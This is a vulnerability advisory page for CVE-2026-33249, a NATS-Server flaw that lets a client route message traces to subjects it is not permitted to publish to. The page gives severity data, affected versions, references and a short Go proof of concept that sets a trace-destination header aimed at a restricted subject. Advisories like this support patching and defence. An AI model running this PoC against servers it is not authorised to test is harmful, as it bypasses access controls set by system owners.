Security Vulnerability Report
CVE-2026-33249 CVSS 4.3 MEDIUM

CVE-2026-33249

Published: 2026-03-25 21:16:48
Last Modified: 2026-03-26 16:20:55

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Starting in version 2.11.0 and prior to versions 2.11.15 and 2.12.6, a valid client which uses message tracing headers can indicate that the trace messages can be sent to an arbitrary valid subject, including those to which the client does not have publish permission. The payload is a valid trace message and not chosen by the attacker. Versions 2.11.15 and 2.12.6 contain a fix. No known workarounds are available.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (NATS-Server >= 2.11.0, < 2.11.15) - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (NATS-Server >= 2.12.0, < 2.12.6) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
package main

import (
	"fmt"

	"github.com/nats-io/nats.go"
)

// Conceptual Proof of Concept for CVE-2026-33249
// This demonstrates how a client might attempt to redirect trace messages.
func main() {
	// 1. Connect to the vulnerable NATS server
	// Note: Requires a valid user account (Low Privilege)
	nc, err := nats.Connect("nats://localhost:4222")
	if err != nil {
		panic(err)
	}
	defer nc.Close()

	// 2. Define a target subject the client is NOT allowed to publish to
	// For example, a sensitive administrative subject
	restrictedSubject := "admin.system.alerts"

	// 3. Create a message with a tracing header
	// The vulnerability allows the client to dictate where the trace goes
	msg := nats.NewMsg("service.request")
	// Setting a custom header to exploit the tracing logic
	msg.Header.Set("Nats-Trace-Destination", restrictedSubject)

	// 4. Publish the message
	// In vulnerable versions, the server sends a trace reply to 'restrictedSubject'
	// without checking if the client has publish permissions for that subject.
	err = nc.PublishMsg(msg)
	if err != nil {
		fmt.Println("Publish error:", err)
	} else {
		fmt.Printf("Successfully published message. Trace may have been sent to restricted subject: %s\n", restrictedSubject)
	}
}

References

https://advisories.nats.io/CVE/secnote-2026-15.txt (Vendor Advisory)
https://github.com/nats-io/nats-server/security/advisories/GHSA-8m2x-3m6q-6w8j (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33249", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.737", "lastModified": "2026-03-26T16:20:55.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Starting in version 2.11.0 and prior to versions 2.11.15 and 2.12.6, a valid client which uses message tracing headers can indicate that the trace messages can be sent to an arbitrary valid subject, including those to which the client does not have publish permission. The payload is a valid trace message and not chosen by the attacker. Versions 2.11.15 and 2.12.6 contain a fix. No known workarounds are available."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. A partir de la versión 2.11.0 y antes de las versiones 2.11.15 y 2.12.6, un cliente válido que utiliza encabezados de rastreo de mensajes puede indicar que los mensajes de rastreo pueden enviarse a un asunto válido arbitrario, incluidos aquellos para los que el cliente no tiene permiso de publicación. La carga útil es un mensaje de rastreo válido y no es elegido por el atacante. Las versiones 2.11.15 y 2.12.6 contienen una corrección. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.11.0", "versionEndExcluding": "2.11.15", "matchCriteriaId": "04A14239-FB32-4FD3-8B45-BDE015A7F721"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-15.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-8m2x-3m6q-6w8j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}